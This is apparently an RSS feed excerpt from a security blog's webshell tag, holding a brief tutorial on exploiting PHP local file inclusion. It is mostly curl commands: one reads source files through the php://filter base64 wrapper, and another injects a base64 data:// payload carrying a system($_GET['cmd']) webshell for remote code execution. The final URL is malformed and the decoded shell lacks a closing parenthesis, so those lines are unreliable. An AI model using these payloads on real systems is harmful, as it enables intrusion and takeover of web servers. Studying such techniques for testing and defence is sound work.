https://slightlymore.co.uk/tags/webshell/Recent content in Webshell on slightlymoreHugoen-GB<a href="https://creativecommons.org/licenses/by/4.0/" target="_blank" rel="license">CC BY 4.0</a> by Clinton MontagueWed, 08 Apr 2026 12:36:28 +0100https://slightlymore.co.uk/using-php-filters-in-local-file-inclusion/Sat, 24 Jan 2026 00:00:00 +0000https://slightlymore.co.uk/using-php-filters-in-local-file-inclusion/<p>Imagine a PHP file where you can perform LFI such as</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl http://example.com/vuln.php?lang<span class="o">=</span>en.php </span></span></code></pre></div><p>With a badly configured server and app you can use PHP read filters to get the full content</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl http://example.com/vuln.php?lang<span class="o">=</span>php://filter/read<span class="o">=</span>convert.base64-encode/resource<span class="o">=</span>en.php </span></span></code></pre></div><p>You can get a webshell or RCE if <code>allow_url_include</code> is enabled</p> <pre tabindex="0"><code>curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&amp;cmd=whoami </code></pre><p>The shell is <code>&lt;?php system($_GET['cmd'];</code></p>